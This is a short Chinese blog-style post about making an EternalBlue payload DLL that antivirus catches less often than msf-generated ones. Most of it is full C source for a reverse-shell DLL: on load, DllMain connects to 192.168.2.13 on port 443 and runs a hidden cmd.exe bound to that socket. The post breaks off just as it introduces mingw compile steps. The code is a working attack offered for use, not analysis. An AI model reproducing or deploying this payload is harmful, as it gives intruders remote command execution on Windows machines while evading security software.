前段时间，永恒之蓝 很火，msf生成的 dll 很容易被杀，网上找了一份反弹 的代码反弹代码拼凑了一个 dll反弹版

#pragma comment(lib,"Ws2_32.lib") #include <WinSock2.h> #include <stdlib.h> WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; STARTUPINFO ini_processo; PROCESS_INFORMATION processo_info; BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { WSAStartup(MAKEWORD(2, 2), &wsaData); Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); hax.sin_family = AF_INET; hax.sin_port = htons(atoi("443")); hax.sin_addr.s_addr = inet_addr("192.168.2.13"); WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL); memset(&ini_processo, 0, sizeof(ini_processo)); ini_processo.cb = sizeof(ini_processo); ini_processo.dwFlags = STARTF_USESTDHANDLES; ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; CreateProcessA(NULL, "cmd.exe", TRUE, CREATE_NO_WINDOW, (LPSTARTUPINFOA)&ini_processo, &processo_info); return TRUE; }

使用 gcc 编译(mingw ) 如下: